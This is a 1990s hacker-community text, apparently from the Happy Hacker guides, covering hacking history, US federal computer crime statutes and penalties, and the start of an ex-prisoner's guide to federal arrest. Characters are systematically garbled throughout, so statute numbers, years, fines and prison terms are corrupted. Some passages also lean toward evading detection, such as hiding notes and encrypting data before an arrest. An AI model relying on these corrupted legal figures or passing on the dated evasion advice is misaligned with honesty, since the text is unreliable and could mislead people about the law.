/ohen( at /arnegie 6elon 0ni<ersity writes his +h2 thesis on the brand new( ne<er heard of thing called com.uter <iruses& ,9DG& 1t was to be the year( thought millions of 4rwell fans( that the go<ernment would finally get its hands on enough high technology to become Big Brother& 1nstead( science fiction author William Gibson( writing "euromancer on a manual ty.ewriter( coins the term and .aints the .icture of :cybers.ace&: :/ase was the best&&& who e<er ran in 3arth's com.uter matri'& #hen he doublecrossed the wrong .eo.le&&&: 1n ,9DG the first 0S .olice :sting: bulletin board systems a..ear& Since ,9D5( +hrack has been .ro<iding the hacker community with information on o.erating systems( networking

technologies( and tele.hony( as well as relaying other to.ics of interest to the international com.uter underground& #he DMs are the war dialer era& 2es.ite *5+*net and the U&-5 networks( the <ast ma=ority of com.uters can only be accessed by disco<ering their indi<idual .hone lines& #hus one of the most treasured .ri>es of the DMs hacker is a .hone number to some mystery com.uter& /om.uters of this era might be running any of do>ens of arcane o.erating systems and using many communications .rotocols& 6anuals for these systems are often secret& #he hacker scene o.erates on the mentor .rinci.le& 0nless you can find someone who will induct you into the inner circle of a hacker gang that has accumulated documents sal<aged from dum.sters or stolen in burglaries( you are way behind the .ack& 8e<in +oulson makes a name for himself through many daring burglaries of +acific Bell& 2es.ite these barriers( by ,9DD hacking has entered the big time& *ccording to a list of hacker grou.s com.iled by the editors of +hrack on *ugust D( ,9DD( the 0S hosts hundreds of them& #he Secret Ser<ice co<ertly <ideota.es the ,9DD Summer/on con<ention& 1n ,9DD 5obert #a..an 6orris( son of "S* chief scientist 5obert 6orris Sr&( writes an e'.loit that will fore<er be known as the 6orris Worm& 1t uses a combination of finger and sendmail e'.loits to break into a com.uter( co.y itself and then send co.y after co.y on to other com.uters& 6orris( with little com.rehension of the .ower of this e'.onential re.lication( releases it onto the 1nternet& Soon <ulnerable com.uters are filled to their digital gills with worms and clogging communications links as they send co.ies of the worms out to hunt other com.uters& #he young 1nternet( then only a few thousand com.uters strong( crashes& 6orris is arrested( but gets off with .robation& ,99M is the ne't .i<otal year for the 1nternet( as significant as ,9DM and the launch of #/+I1+& 1ns.ired by "elson's Uanadu( #im Berners?7ee of the 3uro.ean 7aboratory for +article +hysics !/35"$ concei<es of a new way to im.lement hy.erte't& He calls it the World Wide Web& 1n ,99, he @uietly unleashes it on the world& /ybers.ace will ne<er be the same& "elson's Uanadu( like +lato( like /+I6( fades& ,99M is also a year of un.recedented numbers of hacker raids and arrests& #he 0S Secret Ser<ice and "ew ;ork State +olice raid +hiber 4.tik( *cid

+hreak( and Scor.ion in "ew ;ork /ity( and arrest #erminus( +ro.het( 7eftist( and 0r<ile& #he /hicago #ask Horce arrests 8night 7ightning and raids 5obert 1>enberg( 6entor( and 3rik Blooda'e& 1t raids both 5ichard *ndrews' home and business& #he 0S Secret Ser<ice and *ri>ona 4rgani>ed /rime and 5acketeering Bureau conduct 4.eration Sunde<il raids in /incinnatti( 2etroit( 7os *ngeles( 6iami( "ewark( +hoeni'( +ittsburgh( 5ichmond( #ucson( San 2iego( San Rose( and San Hrancisco& * famous unreasonable raid that year was the /hicago #ask Horce in<asion of Ste<e Rackson Games( 1nc& Rune ,99M 6itch 8a.or and Rohn +erry Barlow react to the e'cesses of all these raids to found the 3lectronic Hrontier Houndation& 1ts initial .ur.ose is to .rotect hackers& #hey succeed in getting law enforcement to back off the hacker community& 1n ,99%( 6arc *ndreesson and 3ric Bina of the "ational /enter for Su.ercom.uting *..lications release 6osaic( the first WWW browser that can show gra.hics& Hinally( after the fade out of the +lato of twenty years .ast( we ha<e decent gra.hics #his time( howe<er( these gra.hics are here to stay& Soon the Web becomes the number one way that hackers boast and s.read the codes for their e'.loits& Bulletin boards( with their tightly held secrets( fade from the scene& 1n ,99%( the first 2ef /on in<ades 7as Cegas& #he era of hacker cons mo<es into full swing with the Beyond Ho.e series( HoHocon and more& ,99E *le.h 4ne takes o<er the Bugta@ email list and turns it into the first .ublic :full disclosure: com.uter security list& Hor the first time in history( security flaws that can be used to break into com.uters are being discussed o.enly and with the com.lete e'.loit codes& Bugtra@ archi<es are .laced on the Web& 1n *ugust ,99E 1 start mailing out Guides to !mostly$ Harmless Hacking& #hey are full of sim.le instructions designed to hel. no<ices understand hacking& * number of hackers come forward to hel. run what becomes the Ha..y Hacker 2igest& ,99E is also the year when documentation for routers( o.erating systems( #/+I1+ .rotocols and much( much more begins to .roliferate on the Web& #he era of daring burglaries of technical manuals fades&

1n early ,99K the readers of Bugtra@ begin to tear the Windows "# o.erating system to shreds& * new mail list( "# Bugtra@( is launched =ust to handle the high <olume of "# security flaws disco<ered by its readers& Self?.roclaimed hackers 6udge and Weld of #he 7M.ht( in a tour de force of research( write and release a .assword cracker for Win"# that rocks the 1nternet& 6any in the com.uter security community ha<e come far enough along by now to reali>e that 6udge and Weld are doing the owners of "# networks a great ser<ice& #hanks to the willingness of hackers to share their knowledge on the Web( and mail lists such as Bugtra@( "# Bugtra@ and Ha..y Hacker( the days of .eo.le ha<ing to beg to be inducted into hacker gangs in order to learn hacking secrets are now fading& Where ne't will the hacker world e<ol<e? ;ou hold the answer to that in your hands& /ontents of the /rime Colume: /om.uter /rime 7aw 1ssue 9, 3<erything a hacker needs to know about getting busted by the feds FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G /om.uter /rime 7aw 1ssue 9, By +eter #hirusel<am ^.sel<amJi'&netcom&comV and /arolyn 6einel FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #ired of reading all those `;ou could go to =aila notes in these guides? Who says those things are crimes? Well( now you can get the first in a series of Guides to the gory details of e'actly what laws webre trying to kee. you from accidentally breaking( and who will bust you if you go ahead with the crime anyhow&

#his Guide co<ers the two most im.ortant 0S Hederal com.uter crime statutes: ,D 0S/( /ha.ter GK( Section ,M-9( and Section ,M%M( known as the `/om.uter Hraud and *buse *ct of ,9DE&a "ow these are not the )only) com.uter crime laws& 1tbs =ust that these are the two most im.ortant laws used in 0S Hederal /ourts to .ut com.uter criminals behind bars& /46+0#35 /5163S: H4W /4664"? H4W 4H#3" *53 #H3; 53+45#32? #he HB1bs national /om.uter /rimes S@uad estimates that between D5 and 9K .ercent of com.uter intrusions are not e<en detected& 1n a recent test s.onsored by the 2e.artment of 2efense( the statistics were startling& *ttem.ts were made to attack a total of D9%- systems .artici.ating in the test& KDEM of those systems were successfully .enetrated& #he management of only %9M of those KDEM systems detected the attacks( and only ,9 of the managers re.orted the attacks !5ichard +ower( ?/urrent and Huture 2anger: * /S1 +rimer on /om.uter /rime and 1nformation WarfareF( /om.uter Security 1nstitute( ,995&$ #he reason so few attacks were re.orted was `mainly because organi>ations fre@uently fear their em.loyees( clients( and stockholders will lose faith in them if they admit that their com.uters ha<e been attacked&a Besides( of the com.uter crimes that )are) re.orted( few are e<er sol<ed& S4( *53 H*/835S * B1G /*0S3 4H /46+0#35 21S*S#35S? *ccording to the /om.uter Security 1nstitute( these are the ty.es of com.uter crime and other losses: L Human errors ? 55P L +hysical security .roblems ? -MP!e&g&( natural disasters( .ower .roblems$ L 1nsider attacks conducted for the .ur.ose of .rofiting from com.uter crime ? ,MP L 2isgruntled em.loyees seeking re<enge ? 9P L Ciruses ? GP L 4utsider attacks ? ,?%P So when you consider that many of the outsider attacks come from .rofessional com.uter criminals ?? many of whom are em.loyees of the

com.etitors of the <ictims( hackers are res.onsible for almost no damage at all to com.uters& 1n fact( on the a<erage( it has been our e'.erience that hackers do far more good than harm& ;es( we are saying that the recreational hacker who =ust likes to .lay around with other .eo.lebs com.uters is not the guy to be afraid of& 1tbs far more likely to be some guy in a suit who is an em.loyee of his <ictim& But you would ne<er know it from the media( would you? 4C35C13W 4H 0S H3235*7 7*WS 1n general( a com.uter crime breaks federal laws when it falls into one of these categories: L 1t in<ol<es the theft or com.romise of national defense( foreign relations( atomic energy( or other restricted information& L 1t in<ol<es a com.uter owned by a 0&S& go<ernment de.artment or agency& L 1t in<ol<es a bank or most other ty.es of financial institutions& L 1t in<ol<es interstate or foreign communications& L it in<ol<es .eo.le or com.uters in other states or countries& 4f these offenses( the HB1 ordinarily has =urisdiction o<er cases in<ol<ing national security( terrorism( banking( and organi>ed crime& #he 0&S& Secret Ser<ice has =urisdiction whene<er the #reasury 2e.artment is <ictimi>ed or whene<er com.uters are attacked that are not under HB1 or 0&S& Secret Ser<ice =urisdiction !e&g&( in cases of .assword or access code theft$& 1n certain federal cases( the customs 2e.artment( the /ommerce 2e.artment( or a military organi>ation( such as the *ir Horce 4ffice of 1n<estigations( may ha<e =urisdiction& 1n the 0nited States( a number of federal laws .rotect against attacks on com.uters( misuse of .asswords( electronic in<asions of .ri<acy( and other transgressions& #he /om.uter Hraud and *buse *ct of ,9DE is the main .iece of legislation that go<erns most common com.uter crimes( although many other laws may be used to .rosecute different ty.es of com.uter crime& #he act amended #itle ,D 0nited States /ode c,M%M& 1t also com.lemented the 3lectronic /ommunications +ri<acy *ct of ,9DE( which outlawed the unauthori>ed interce.tion of digital communications and had =ust recently

been .assed& #he /om.uter *buse *mendments *ct of ,99G e'.anded the ,9DE *ct to address the transmission of <iruses and other harmful code& 1n addition to federal laws( most of the states ha<e ado.ted their own com.uter crime laws& * number of countries outside the 0nited States ha<e also .assed legislation defining and .rohibiting com.uter crime& #H3 B1G "4 "4bS ?? #H3 #W4 64S# 16+45#*"# H3235*7 /5163 7*WS *s mentioned abo<e( the two most im.ortant 0S federal com.uter crime laws are ,D 0S/: /ha.ter GK( Sections ,M-9 and ,M%M& S3/#14" ,M-9 Section ,M-9 .rohibits fraud and related acti<ity that is made .ossible by counterfeit access de<ices such as +1"s( credit cards( account numbers( and <arious ty.es of electronic identifiers& #he nine areas of criminal acti<ity co<ered by Section ,M-9 are listed below& *ll )re@uire) that the offense in<ol<ed interstate or foreign commerce& ,& +roducing( using( or trafficking in counterfeit access de<ices& !#he offense must be committed knowingly and with intent to defraud&$ +enalty: Hine of O5M(MMM or twice the <alue of the crime andIor u. to ,5 years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& -& 0sing or obtaining unauthori>ed access de<ices to obtain anything of <alue totaling O,MMM or more during a one?year .eriod& !#he offense must be committed knowingly and with intent to defraud&$ +enalty: Hine of O,M(MMM or twice the <alue of the crime andIor u. to ,M years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& %& +ossessing ,5 or more counterfeit or unauthori>ed access de<ices& !#he offense must be committed knowingly and with intent to defraud&$ +enalty: Hine of O,M(MMM or twice the <alue of the crime andIor u. to ,M years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense&

G& +roducing( trafficking in( or ha<ing de<ice?making e@ui.ment& !#he offense must be committed knowingly and with intent to defraud&$ +enalty: Hine of O5M(MMM or twice the <alue of the of the crime andIor u. to ,5 years in .rison( O,(MMM(MMM andIor u. to -M years if re.eat offense& 5& 3ffecting transactions with access de<ices issued to another .erson in order to recei<e .ayment or anything of <alue totaling O,MMM or more during a one?year .eriod& !#he offense must be committed knowingly and with intent to defraud&$ +enalty: Hine of ,M( or twice the <alue of the crime andIor u. to ,M years in .rison( ,MM(MMM andIor u. to -M years if re.eat offense& E& Soliciting a .erson for the .ur.ose of offering an access de<ice or selling information that can be used to obtain an access de<ice& !#he offense must be committed knowingly and with intent to defraud( and without the authori>ation of the issuer of the access de<ice&$ +enalty: Hine of O5M(MMM or twice the <alue of the crime andIor u. to ,5 years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& K& 0sing( .roducing( trafficking in( or ha<ing a telecommunications instruments that has been modified or altered to obtain unauthori>ed use of telecommunications ser<ices& !#he offense must be committed knowingly and with intent to defraud&$ #his would co<er use of `5ed Bo'es(a `Blue Bo'esa !yes( they still work on some tele.hone networks$ and cloned cell .hones when the legitimate owner of the .hone you ha<e cloned has not agreed to it being cloned& +enalty: Hine of O5M(MMM or twice the <alue of the crime andIor u. to ,5 years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& D& 0sing( .roducing( trafficking in( or ha<ing a scanning recei<er or hardware or software used to alter or modify telecommunications instruments to obtain unauthori>ed access to telecommunications ser<ices& #his outlaws the scanners that .eo.le so commonly use to snoo. on cell .hone calls& We =ust had a big scandal when the news media got a hold of an

interce.ted cell .hone call from S.eaker of the 0S House of 5e.resentati<es "ewt Gingrich& +enalty: Hine of O5M(MMM or twice the <alue of the crime andIor u. to ,5 years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& 9& /ausing or arranging for a .erson to .resent( to a credit card system member or its agent for .ayment( records of transactions made by an access de<ice&!#he offense must be committed knowingly and with intent to defraud( and without the authori>ation of the credit card system member or its agent& +enalty: Hine of O,M(MMM or twice the <alue of the crime andIor u. to ,M years in .rison( O,MM(MMM andIor u. to -M years if re.eat offense& S3/#14" ,M%M ,D 0S/( /ha.ter GK( Section ,M%M( enacted as .art of the /om.uter Hraud and *buse *ct of ,9DE( .rohibits unauthori>ed or fraudulent access to go<ernment com.uters( and establishes .enalties for such access& #his act is one of the few .ieces of federal legislation solely concerned with com.uters& 0nder the /om.uter Hraud and *buse *ct( the 0&S& Secret Ser<ice and the HB1 e'.licitly ha<e been gi<en =urisdiction to in<estigate the offenses defined under this act& #he si' areas of criminal acti<ity co<ered by Section ,M%M are: ,& *c@uiring national defense( foreign relations( or restricted atomic energy information with the intent or reason to belie<e that the information can be used to in=ure the 0nited States or to the ad<antage of any foreign nation& !#he offense must be committed knowingly by accessing a com.uter without authori>ation or e'ceeding authori>ed access&$ -& 4btaining information in a financial record of a financial institution or a card issuer( or information on a consumer in a file of a consumer re.orting agency& !#he offense must be committed intentionally by accessing a com.uter without authori>ation or e'ceeding authori>ed access&$ 1m.ortant note: recently on the dc?stuff hackersb list a fellow whose name we shall not re.eat claimed to ha<e `hacked #5Wa to get a re.ort on someone which he .osted to the list& We ho.e this fellow was lying and sim.ly .aid the fee to .urchase the re.ort&

+enalty: Hine andIor u. to , year in .rison( u. to ,M years if re.eat offense& %& *ffecting a com.uter e'clusi<ely for the use of a 0&S& go<ernment de.artment or agency or( if it is not e'clusi<e( one used for the go<ernment where the offense ad<ersely affects the use of the go<ernmentbs o.eration of the com.uter& !#he offense must be committed intentionally by accessing a com.uter without authori>ation&$ #his could a..ly to syn flood and killer .ing as well as other denial of ser<ice attacks( as well as breaking into a com.uter and messing around& +lease remember to ti.toe around com.uters with &mil or &go< domain names +enalty: Hine andIor u. to , year in .rison( u. to ,M years if re.eat offense& G& Hurthering a fraud by accessing a federal interest com.uter and obtaining anything of <alue( unless the fraud and the thing obtained consists only of the use of the com.uter& !#he offense must be committed knowingly( with intent to defraud( and without authori>ation or e'ceeding authori>ation&$Y#he go<ernmentbs <iew of `federal interest com.utera is defined belowZ Watch out 3<en if you download co.ies of .rograms =ust to study them( this law means if the owner of the .rogram says( `;eah( 1bd say itbs worth a million dollars(a youbre in dee. trouble& +enalty: Hine andIor u. to 5 years in .rison( u. to ,M years if re.eat offense& 5& #hrough use of a com.uter used in interstate commerce( knowingly causing the transmission of a .rogram( information( code( or command to a com.uter system& #here are two se.arate scenarios: a& 1n this scenario( !1$ the .erson causing the transmission intends it to damage the com.uter or deny use to itA and !ii$ the transmission occurs without the authori>ation of the com.uter owners or o.erators( and causes O,MMM or more in loss or damage( or modifies or im.airs( or .otentially modifies or im.airs( a medical treatment or e'amination& #he most common way someone gets into trouble with this .art of the law is when trying to co<er tracks after breaking into a com.uter& While editing or( worse yet( erasing <arious files( the intruder may accidentally erase something im.ortant& 4r some command he or she gi<es may accidentally mess things

u.& ;eah( =ust try to .ro<e it was an accident& Rust ask any systems administrator about gi<ing commands as root& 3<en when you know a com.uter like the back of your hand it is too easy to mess u.& * sim.le email bomb attack( `killer .ing(a flood .ing( syn flood( and those huge numbers of Windows "# e'.loits where sending sim.le commands to many of its .orts causes a crash could also break this law& So e<en if you are a newbie hacker( some of the sim.lest e'.loits can land you in dee. cra. +enalty with intent to harm: Hine andIor u. to 5 years in .rison( u. to ,M years if re.eat offense& b& 1n this scenario( !1$ the .erson causing the transmission does not intend the damage but o.erates with reckless disregard of the risk that the transmission will cause damage to the com.uter owners or o.erators( and causes O,MMM or more in loss or damage( or modifies or im.airs( or .otentially modifies or im.airs( a medical treatment or e'amination& #his means that e<en if you can .ro<e you harmed the com.uter by accident( you still may go to .rison& +enalty for acting with reckless disregard: Hine andIor u. to , year in .rison& E& Hurthering a fraud by trafficking in .asswords or similar information which will allow a com.uter to be accessed without authori>ation( if the trafficking affects interstate or foreign commerce or if the com.uter affected is used by or for the go<ernment& !#he offense must be committed knowingly and with intent to defraud&$ * common way to break this .art of the law comes from the desire to boast& When one hacker finds a way to sli. into another .ersonbs com.uter( it can be really tem.ting to gi<e out a .assword to someone else& +retty soon do>ens of clueless newbies are carelessly messing around the <ictim com.uter& #hey also boast& Before you know it you are in dee. crud& +enalty: Hine andIor u. to , year in .rison( u. to ,M years if re.eat offense& 5e: 9G Section ,M%M defines a federal interest com.uter as follows: ,& * com.uter that is e'clusi<ely for use of a financial institutionYdefined belowZ or the 0&S& go<ernment or( if it is not e'clusi<e( one used for a

financial institution or the 0&S& go<ernment where the offense ad<ersely affects the use of the financial institutionbs or go<ernmentbs o.eration of the com.uterA or -& * com.uter that is one of two or more com.uters used to commit the offense( not all of which are located in the same state& #his section defines a financial institution as follows: ,& *n institution with de.osits insured by the Hederal 2e.osit 1nsurance /or.oration!H21/$& -& #he Hederal 5eser<e or a member of the Hederal 5eser<e( including any Hederal 5eser<e Bank& %& * credit union with accounts insured by the "ational /redit 0nion *dministration& G& * member of the federal home loan bank system and any home loan bank& 5& *ny institution of the Harm /redit system under the Harm /redit *ct of ,9K,& E& * broker?dealer registered with the Securities and 3'change /ommission!S3/$ within the rules of section ,5 of the S3/ *ct of ,9%G& K& #he Securities 1n<estors +rotection /or.oration& D& * branch or agency of a foreign bank !as defined in the 1nternational Banking *ct of ,9KD$& 9& *n organi>ation o.erating under section -5 or -5!a$ of the Hederal 5eser<e *ct& WH4bS 1" /H*5G3 4H B0S#1"G #H3 /5*/835 WH4 G3#S * B1# H54GG; 53G*521"G S3/#14" ,M%M? !HB1 stands for Hederal Bureau of 1n<estigation( 0SSS for 0S Secret Ser<ice$ Section of 7aw #y.e of 1nformation Rurisdiction

,M%M!a$!,$

"ational Security

HB1 U U U

0SSS

R41"#

"ational defense ,M%M!a$!-$ Horeign relations 5estricted atomic energy ,M%M!a$!-$ Hinancial or consumer Hinancial records of banks( other financial institutions Hinancial records of card issuers 1nformation on consumers in files of a consumer re.orting agency "on?bank financial institutions ,M%M!a$!%$ Go<ernment com.uters "ational defense Horeign relations 5estricted data White House *ll other go<ernment com.uters ,M%M!a$!G$ Hederal interest com.uters: 1ntent to defraud

U U U U U U U U U U U U U

,M%M!a$!5$!*$ #ransmission of .rograms( commands: 1ntent to damage or deny use ,M%M!a$!5$!B$ #ransmission off .rograms( commands: 5eckless disregard ,M%M !a$!E$ #rafficking in .asswords: 1nterstate or foreign commerce /om.uters used by or for the go<ernment

5egarding ,M%M !a$!-$: #he HB1 has =urisdiction o<er bank fraud <iolations( which include categories !,$ through !5$ in the list of financial institutions defined abo<e& #he Secret Ser<ice and HB1 share =oint =urisdiction o<er non? bank financial institutions defined in categories !E$ and !K$ in the list of financial institutions defined abo<e& 5egarding ,M%M!a$!%$ Go<ernment /om.uters: #he HB1 is the .rimary in<estigati<e agency for <iolations of this section when it in<ol<es national defense& 1nformation .ertaining to foreign relations( and other restricted data& 0nauthori>ed access to other information in go<ernment com.uters falls under the .rimary =urisdiction of the Secret Ser<ice& 645*7: /4"H0/10S S*;: `/5*/835 WH4 G3#S B0S#32 241"G 4"3 4H #H3S3 /5163S( W177 S+3"2 74"G #163 1" R*17H40S3 S40+&a #his information was swi.ed from F/om.uter /rime: * /rimefighterbs HandbookF !1co<e( Seger N ConStorch& 4b5eilly N *ssociates( 1nc&$ #he following is *gent Steal's guide to what one will face if one is arrested in the 0S for com.uter crime& /riminal hackers will try to .ersuade you that if you are elite( you won't get busted& But as *gent Steal and so many others ha<e learned( it isn't that easy to get away with stuff& ???????????????????????????????????????????????????????????????? 3C35;#H1"G * H*/835 "332S #4 8"4W *B40# G3##1"G B0S#32 B; #H3 H32S ???????????????????????????????????????????????????????????????? Written By *gent Steal !Hrom Hederal +rison( ,99K$ 1nternet 3?mail( agentstealJusa&net /ontributions and editing by 6inor #hreat and "etta Gilboa S.ecial thanks to 3<ian S& Sim #his article may be freely re.roduced( in whole or in .art( .ro<ided acknowledgments are gi<en to the author& *ny re.roduction for .rofit( lame >ines( !that means you tMmmy( elD( you thief$ or law enforcement use is .rohibited& #he author and contributors to this .hile in no way ad<ocate criminal beha<ior& ???????????????? /4"#3"#S ????????????????

+*5# 1 ? H3235*7 /5161"*7 7*W Horeward 1ntroduction *& 5ele<ant /onduct B& +re.aring for #rial /& +lea *greements and *ttorneys 2& /ons.iracy 3& Sentencing H& 0se of S.ecial Skill G& Getting Bail H& State <& Hederal /harges 1& /oo.erating R& Still #hinking *bout #rial 8& Search and Sei>ure 7& Sur<eillance 6& +resentence 1n<estigation "& +roceeding +ro Se 4& 3<identiary Hearing +& 5eturn of +ro.erty S& 4utstanding Warrants 5& 3ncry.tion S& Summary +*5# 11 ? H3235*7 +51S4" *& State <& Hederal B& Security 7e<els /& Getting 2esignated 2& 1gnorant 1nmates 3& +o.ulation H& 2oing #ime G& 2isci.linary *ction H& *dministrati<e 5emedy 1& +rison 4fficials R& #he Hole 8& Good #ime 7& Halfway House 6& Su.er<ised 5elease "& Summary

H453W452 "obody wants to get in<ol<ed in a criminal case and 1'<e yet to meet a hacker who was fully .re.ared for it ha..ening to them& #here are thousands of .a.er and electronic maga>ines( /2?546S( web .ages and te't files about hackers and hacking a<ailable( yet there is nothing in .rint until now that s.ecifically co<ers what to do when an arrest actually ha..ens to you& 6ost hackers do not .lan for an arrest by hiding their notes or encry.ting their data( and most of them ha<e some sort of address book sei>ed from them too !the most famous of which still remains the one sei>ed from #he "ot So Humble Babe$& 6ost of them aren't told the full sco.e of the in<estigation u. front( and as the case goes on more comes to light( often only at the last minute& 1n<ariably( the hacker in @uestion was wireta..ed andIor narced on by someone .re<iously raided who co<ered u. their own raid or minimi>ed it in order to get off by im.licating others& 4nce one .erson goes down it always affects many others later& 6y own e'.erience comes from li<ing with a retired hacker arrested ten months after he had sto..ed hacking for old crimes because another hacker informed on him in e'change for being let go himself& What goes around( comes around& 1t's food for thought that the hacker you taunt today will be able to cut a deal for himself by informing on you later& Hrom what 1'<e seen on the criminal =ustice system as it relates to hackers( the less enemies you .ick on the better and the less grou.s you =oin and .eo.le who you i nteract with the better as well& #here's a lot to be said for being considered a lamer and ha<ing no one really ha<e anything to .in on you when the feds ask around& 1 met *gent Steal( ironically( as a result of the hackers who had fun .icking on me at 2efcon& 1 .osted the s.eech 1 ga<e there on the Gray *reas web .age !which 1 had not originally intended to .ost( but decided to after it was literally stolen out of my hands so 1 could not finish it$ and someone sent *gent Steal a co.y while he was incarcerated& He wrote me a letter of su..ort( and while se<eral hackers taunted me that 1 had no friends in the community and was not wanted( and one e<en mailbombed our /om.uSer<e account causing us to lose the account and our email there( 1 laughed knowing that this article was in .rogress and that of all of the .ublications it could ha<e been gi<en to first it was Gray *reas that was chosen& #his article marks the first im.ortant attem.t at coo.eration to inform the community as a whole !e<en our indi<idual enemies$ about how best to .rotect themsel<es& 1 know there will be many more hacker cases until

hackers work together instead of attacking each other and making it so easy for the go<ernment to di<ide them& 1t's a sad reality that "*6B7*( deadheads( adult film stars and bookstores( mari=uana users and other de<iant grou.s are so much more organi>ed than hackers who claim to be so ade.t at( and in<ol<ed with( gathering and using information& Hackers are sim.ly the easiest targets of any criminal subculture& While Hacker>&org makes nice #? shirts !which they don't gi<e free or e<en discount to hackers in =ail( btw$( they sim.ly don't ha<e the resources to hel. hackers in trouble& "either does the 3HH( which lacks lawyers willing to work .ro bono !free$ in most of the 5M states& 8night 7ightning still owes his attorney money& So does Bernie S& #his is not something that disa..ears from your life the day the case is o<er& DMP or more of .risoners lose their lo<ers andIor their families after the arrest& While there are notable e'ce.tions( this has been true for more hackers than 1 care to think about& #he HB1 or Secret Ser<ice will likely <isit your lo<ers and try to turn them against you& #he mainstream media will lie about your charges( the facts of your case and the outcome& 1f you're lucky they'll remember to use the word :allegedly&: While most hackers .robably think 3mmanuel Goldstein and -EMM will hel. them( 1 know of many hackers whose cases he ignored totally when contacted& *lthough he's credited for hel.ing +hiber 4.tik( in reality +hiber got more =ail time for going to trial on 3mmanuel's ad<ice than his co?defendants who didn't ha<e 3mmanuel hel. them and .led instead& Bernie S& got his =aw broken .erha.s in .art from the go<ernment's anger at 3mmanuel's .ublici>ing of the case( and des.ite all the attention 3mmanuel has gotten for 8e<in 6itnick it didn't sto. 6itnick's being .ut in solitary confinement or s.eed u. his trial date any& 4ne thing is clear though& 3mmanuel's sales of -EMM dramatically increased as a result of co<ering the abo<e cases to the tune of o<er -5(MMM co.ies .er issue& 1t does gi<e .ause for thought( if he cares so much about the hackers and not his own sales and fame( as to why he has no ties to the Hacker>&org defense fund or why he has not started something useful of his own& +hrack and other >ines historically ha<e merely re.osted incorrect news.a.er re.orts which can cause the hackers co<ered e<en more damage& 6ost of your hacker friends who you now talk to daily will run from you after your arrest and will tell other .eo.le all sorts of stories to co<er u. the fact they don't know a thing& 5emember too that your :friends: are the .eo.le most likely to get you arrested too( as e<en if your .hone isn't wireta..ed now theirs may be( and the .o.ular <oice bridges and conference calls you talk to them on surely are& #hey say information wants to be free( and so here is a gift to the community !also @uite a..licable to anyone accused of any federal crime if one substitutes another crime for the word hacking$& "e't time you .ut down a

hacker in =ail and laugh about how they are getting ra.ed while you're on 15/( remember that someone is .robably logging you and if you stay acti<e it's a good bet your day will come too& ;ou won't be laughing then( and 1 ho.e you'll ha<e .aid good attention when you're suddenly in =ai l with no bail granted and e<ery last word you read here turns out to be true& #hose of us who ha<e been there before wish you good luck in ad<ance& 5emember the ne't time you .ut them down that ironically it's them you'll ha<e to turn to for ad<ice shoul d it ha..en to you& ;our lawyer isn't likely to know a thing about com.uter crimes and it's the cases of the hackers who were arrested before you which( like it or not( will .ro<ide the legal .recedents for your own con<iction& "etta :grayarea: Gilboa 1"#5420/#14" #he likelihood of getting arrested for com.uter hacking has increased to an un.recedented le<el& "o matter how .recautionary or sage you are( you're bound to make mistakes& *nd the fact of the matter is if you ha<e trusted anyone else with the know ledge of what you are in<ol<ed in( you ha<e made your first mistake& Hor anyone acti<e in hacking 1 cannot begin to stress the im.ortance of the information contained in this file& #o those who ha<e =ust been arrested by the Heds( reading this file could mean the difference between a three?year or a one?year sentence& #o those who ha<e ne<er been busted( reading this file will likely change the way you hack( or sto. you from hacking altogether& 1 reali>e my .re<ious statements are somewhat lofty( but in the %5 months 1 s.ent incarcerated 1'<e heard countless inmates say it: :1f 1 knew then what 1 know now&: 1 doubt that anyone would disagree: #he criminal =ustice system is a game to be .layed( both by .rosecution and defense& *nd if you ha<e to be a .layer( you would be wise to learn the rules of engagement& #he writer and contributors of this file ha<e learned the hard way& *s a result we turned our hacking skills during the times of our incarceration towards the study of criminal law and( ultimately( sur<i<al& Ha<ing filed our own motions( written our own briefs and endured life in .rison( we now .ass this knowledge back to the hacker community& 7earn from our e'.eriences&&& and our mistakes& *gent Steal

+*5# 1 ? H3235*7 /5161"*7 7*W *& #H3 B4##46 71"3 ? 5373C*"# /4"20/# Hor those of you with a short G?.hile attention s.an 1'm going to co<er the single most im.ortant to.ic first& #his is .robably the most substantial misunderstanding of the .resent criminal =ustice system& #he sub=ect 1 am talking about is referred to in legal circles as :rele<ant conduct&: 1t's a bit com.le' and 1 will get into this& Howe<er( 1 ha<e to make his crystal clear so that it will stick in your heads& 1t boils down to two conce.ts: 1& 4"/3 ;40 *53 H40"2 G017#; 4H 3C3" 4"3 /40"#( 3C35; /40"# W177 B3 0S32 #4 /*7/07*#3 ;405 S3"#3"/3 5egardless of whether you .lea bargain to one count or ,MM( your sentence will be the same& #his is assuming we are talking about hacking( code abuse( carding( com.uter tres.ass( .ro.erty theft( etc& *ll of these are treated the same& 4ther crimes you committed !but were not charged with$ will also be used to calculate your sentence& ;ou do not ha<e to be .ro<en guilty of e<ery act& *s long as it a..ears that you were res.onsible( or someone says you were( then it can be used against you& 1 know this sounds insane ( but it's trueA it's the .re.onderance of e<idence standard for rele<ant conduct& #his .ractice includes using illegally sei>ed e<idence and ac@uittals as information in increasing the length of your sentence& 11& ;405 S3"#3"/3 W177 B3 B*S32 4" #H3 #4#*7 64"3#*5; 74SS #he Heds use a sentencing table to calculate your sentence& 1t's sim.leA 6ore 6oney W 6ore #ime& 1t doesn't matter if you tried to break in ,M times or ,M(MMM times& 3ach one could be a count but it's the loss that matters& *nd an unsuccessful attem.t is treated the same as a com.leted crime& 1t also doesn't matter if you tried to break into one com.any's com.uter or ,M& #he go<ernment will @uite sim.ly add all of the estimated loss figures u.( and then refer to the sentencing table& B& +53+*51"G H45 #51*7 1'<e been trying to be o<erly sim.listic with my e'.lanation& #he 0nited States Sentencing Guidelines !0&S&S&G&$( are in fact @uite com.le'& So much

